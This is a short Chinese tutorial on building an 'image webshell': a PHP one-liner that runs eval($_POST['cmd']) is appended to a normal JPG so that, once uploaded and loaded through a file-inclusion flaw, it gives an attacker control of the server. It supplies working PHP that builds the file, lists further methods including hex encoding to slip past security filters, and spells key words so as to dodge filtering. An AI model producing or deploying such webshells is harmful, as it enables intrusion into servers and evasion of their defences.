制作马图
方式一
一句话mu马图片是指将一句话mu马代码隐藏在正常的图片文件中,使得该图片文件成为一个mu马文件。公鸡者可以通过上传该图片文件到受害者的服务器上,并利用文件包含漏洞来执行该mu马代码,从而获取服务器的控制权。
下面是一个生成一句话mu马图片的示例代码:
<?php $code = '<?php eval($_POST["cmd"]); ?>'; // 一句话马代码 $filename = 'shell.php'; // 生成的马文件名 $image = 'pic.jpg'; // 正常的图片文件名 $webshell = 'webshell.jpg'; // 生成的一句话马图片文件名 // 生成一句话马文件 file_put_contents($filename, $code); // 将一句话mu马文件和正常的图片文件合并成一张图片马 $data = file_get_contents($image); $data .= file_get_contents($filename); file_put_contents($webshell, $data); // 删除一句话马文件 unlink($filename);
该代码将一句话mu马代码存储在变量$code中,将生成的mu马文件名存储在变量$filename中,将正常的图片文件名存储在变量$image中,将生成的一句话mu马图片文件名存储在变量$webshell中。然后,该代码将一句话mu马文件和正常的图片文件合并成一张图片马,并将其保存为文件webshell.jpg。最后,该代码删除一句话mu马文件。
方式二
利用脚本edjpgcom
将图片投入到edjpgcom脚本,然后写入一句话马
方式三
利用cmd命令
方式四
利用16进制编写一句话,有更好的绕过安全过滤
